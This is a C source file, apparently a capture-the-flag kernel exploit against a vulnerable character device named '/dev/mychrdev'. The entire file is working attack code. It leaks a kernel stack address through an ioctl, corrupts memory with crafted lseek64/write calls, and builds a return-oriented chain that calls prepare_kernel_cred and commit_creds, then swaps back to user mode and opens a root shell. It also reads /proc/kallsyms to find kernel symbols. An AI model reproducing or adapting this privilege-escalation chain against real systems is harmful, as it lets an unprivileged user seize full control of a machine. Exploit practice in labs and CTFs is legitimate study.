// gcc exp.c -o exp -masm=intel -static
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#define pop_rdi_ret 0xFFFFFFFF813EAD2C
#define swapgs_popfq_ret 0xFFFFFFFF81C00EAE // swapgs; popfq; pop rbp; ret;
#define iretq 0xFFFFFFFF81025A56	// iretq; pop rbp; ret;
#define xchg_rax_rdi 0xFFFFFFFF81768EF2
#define vmlinux_base 0xFFFFFFFF81000000
#define dev_text_base 0xFFFFFFFFC0000000
size_t commit_creds = 0xFFFFFFFF8108D340, prepare_kernel_cred = 0xFFFFFFFF8108D690;
size_t user_cs, user_ss, user_rflags, user_sp;
size_t data[0x4000];
size_t mydata;
size_t stack;
void save_status()
{
	__asm__("mov user_cs, cs;"
			"mov user_ss, ss;"
			"mov user_sp, rsp;"
			"pushf;"
			"pop user_rflags;"
			);
	puts("[*]Status Has Been Saved.");
}
size_t find_symbols()
{
	FILE* kallsyms_fd = fopen("/proc/kallsyms", "r");

	if(kallsyms_fd < 0)
	{
		puts("[*]open kallsyms error!");
		exit(0);
	}

	char buf[0x30] = {0};
	while(fgets(buf, 0x30, kallsyms_fd))
	{
		if(commit_creds & prepare_kernel_cred)
			return 0;

		if(strstr(buf, "commit_creds") && !commit_creds)
		{
			char hex[20] = {0};
			strncpy(hex, buf, 16);
			sscanf(hex, "%llx", &commit_creds);
			printf("Commit_Creds: %p\n", commit_creds);
		}

		if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
		{
			char hex[20] = {0};
			strncpy(hex, buf, 16);
			sscanf(hex, "%llx", &prepare_kernel_cred);
			printf("Prepare_Kernel_Cred: %p\n", prepare_kernel_cred);
		}
	}

	if(!(prepare_kernel_cred & commit_creds))
	{
		puts("[*]Error!");
		exit(0);
	}

}
void get_root()
{
	char* (*pkc)(int) = prepare_kernel_cred;
	void (*cc)(char*) = commit_creds;
	(*cc)((*pkc)(0));
}

void get_shell()
{
	system("/bin/sh");
}

int main()
{
	save_status();
	signal(SIGSEGV, get_shell);
	signal(SIGTRAP, get_shell);
	int fd = open("/dev/mychrdev",O_WRONLY);
	ioctl(fd,0x1111,data);
	mydata = data[4];
	stack = (data[2] | 0xFFFFC90000000000) - 0x10;
	printf("[+] mydata at: %p\n",mydata);
	printf("[+] Stack at: %p\n",stack);
	write(fd,data,0xF000);
	lseek64(fd,0x100,0);
	write(fd,data,0x10000);
	lseek64(fd,0x10001,0);
	data[0] = stack - mydata;
	data[1] = stack - mydata + 0x10000;
	write(fd,(char*)data+1,0x10000);
	size_t off = stack&0xFF;
	lseek64(fd,off,0);
	int i = 0;
	data[i++] = pop_rdi_ret;
	data[i++] = 0;
	data[i++] = prepare_kernel_cred;
	data[i++] = xchg_rax_rdi;
	data[i++] = commit_creds;
	data[i++] = swapgs_popfq_ret;			// swapgs; popfq; ret
	data[i++] = 0; 						// rflags
	data[i++] = 0;
	data[i++] = iretq;						// iretq; ret;
	data[i++] = (size_t)get_shell;			// rip

	data[i++] = user_cs;					// cs
	data[i++] = user_rflags;				// rflags
	data[i++] = user_sp;					// rsp
	data[i++] = user_ss;					// ss
	write(fd,data,0x100);
}


